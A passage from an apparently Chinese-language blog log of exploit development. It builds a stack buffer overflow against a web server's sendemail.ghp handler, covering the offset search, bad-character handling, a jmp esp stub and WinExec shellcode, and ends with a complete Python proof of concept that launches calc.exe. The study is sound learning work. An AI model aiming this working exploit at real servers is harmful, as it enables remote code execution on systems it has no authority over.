8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4F"
httpServ = httplib.HTTPConnection("192.168.233.103", 80)
httpServ.connect()
httpServ.request('POST', '/sendemail.ghp',
'Email=%s&getPassword=Get+Password' % our_code)
response = httpServ.getresponse()
httpServ.close()
POC代碼變成這樣,然後程序報錯,查找我們的EIP在哪裏出錯了
然後查找我們的POC代碼中,66463766的位置
這裏具體他的點怎麼定位我就不詳細介紹了,大家可以看我的01的文章
找到4072位置後,我們查找jmp esp的位置,這裏會有一個點的地方要注意
我們查找到了很多地址後,我們不能使用裏面含有\x00的地址,因爲會階段我們發送的poc數據,然後截斷了後面getpassword函數,造成程序跳出溢出的函數,所以我們要使用其他的跳轉地址。這裏我就卡了很久,因爲那時候我使用含有\x00的地址的時候,函數在複製POC的數據的時候,到\x00就結束了,沒有將getpassword的參數放在裏面,然後就跳轉到其他函數去了,一直沒有程序報錯。所以我們的壞字符肯定有\x00
現在我們的棧的情況是這樣的,由於溢出地址後面的空間不足以放下我們的shellcode,所以我們需要將BUF的內容放在溢出點的前面,然後先使用jmpcode,將EIP指向shellcode,然後執行,所以我們的POC要修改成這樣.
our_code = "A"*(4072-112)+(112-96)*"\x90"+buf+(96-len(buf))*'\x90'+"\x3b\x20\xc5\x61"+"C"*12+jmpcode+"C"*4
然後編寫我們的jmpcode和buf。
首先編寫jmpcode。
1.我們不能使用EB短尋址,因爲不確定我們的shellcode有多大。
2.我們不能直接jmp 地址,這樣不知道我們的地址。
所以我換了一個思路,先sub esp,然後jmp esp,因爲我們的shellcode一直在esp中。
jmpcode = "\x83\xEC\x70" //sub esp 70
jmpcode += "\xFF\xE4" //jmp esp
所以編寫jmpcode代碼成這樣,這個是硬編碼。
然後編寫shellcode,我這邊就不編寫反彈shell的了,我自己寫了一個彈出計算器的shellcode,因爲還不能自己寫彈shellcode的硬編碼代碼。
1.先用vs2010編寫C代碼
#include <Windows.h>
int main(int argc, char *argv[])
{
WinExec("calc.exe", 5);
}
2.編譯完成後,右鍵查看硬編碼
WinExec("calc.exe", 5);
00901000 6A 05 push 5
00901002 68 F4 20 90 00 push offset string "calc.exe" (9020F4h)
00901007 FF 15 00 20 90 00 call dword ptr [__imp__WinExec@8 (902000h)]
}
發現他的硬編碼是push兩個值,分別是5和存放calc.exe的數據區地址
所以我們修改我們的硬編碼成這樣
buf += "\x68\x2E\x65\x78\x65" # PUSH ".exe"
buf += "\x68\x63\x61\x6C\x63" # PUSH "calc"
buf += "\x8B\xC4" # MOV EAX,ESP
buf += "\x6A\x05" # PUSH 5
buf += "\x50" # PUSH EAX
buf += "\xBB\x91\x2C\x1A\x77" # MOV EBX,771A2C91
buf += "\xFF\xD3" # CALL EBX
然後運行發現加在POC中,發現無法運行,看看他發生了什麼
這裏我也出錯了,後來百度了以後,發現WinExec使用lpCmdLine參數的時候它不知道參數在哪結束. 我們知道ASCII字符串是以\x00結束 的, 因此我們要給lpCmdLine \x00結束符.如下所示
buf = "\x33\xc0" # XOR EAX,EAX
buf += "\x50" # PUSH EAX
buf += "\x68\x2E\x65\x78\x65" # PUSH ".exe"
buf += "\x68\x63\x61\x6C\x63" # PUSH "calc"
buf += "\x8B\xC4" # MOV EAX,ESP
buf += "\x6A\x05" # PUSH 5
buf += "\x50" # PUSH EAX
buf += "\xBB\x91\x2C\x1A\x77" # MOV EBX,771A2C91
buf += "\xFF\xD3" # CALL EBX
然後最後的POC變成這樣
#!/usr/bin/python
import httplib
buf = "\x33\xc0" # XOR EAX,EAX
buf += "\x50" # PUSH EAX
buf += "\x68\x2E\x65\x78\x65" # PUSH ".exe"
buf += "\x68\x63\x61\x6C\x63" # PUSH "calc"
buf += "\x8B\xC4" # MOV EAX,ESP
buf += "\x6A\x05" # PUSH 5
buf += "\x50" # PUSH EAX
buf += "\xBB\x91\x2C\x1A\x77" # MOV EBX,771A2C91
buf += "\xFF\xD3" # CALL EBX
jmpcode = "\x83\xEC\x70"
jmpcode += "\xFF\xE4"
print len(buf)
our_code = "A"*(4072-112)+(112-96)*"\x90"+buf+(96-len(buf))*'\x90'+"\x3b\x20\xc5\x61"+"C"*12+jmpcode+"C"*4
httpServ = httplib.HTTPConnection("192.168.233.103", 80)
httpServ.connect()
httpServ.request('POST', '/sendemail.ghp',
'Email=%s&getPassword=Get+Password' % our_code)
response = httpServ.getresponse()
httpServ.close()
然後運行,就會發現,我們的POC成功執行
裏面還有很多我不知道的,而且還是棧溢出的漏洞,相對比較簡單,可是我還是花了挺久的時間,本次爲自己的一次分析記錄,下次希望能給大家帶來跟高水平的技術分享。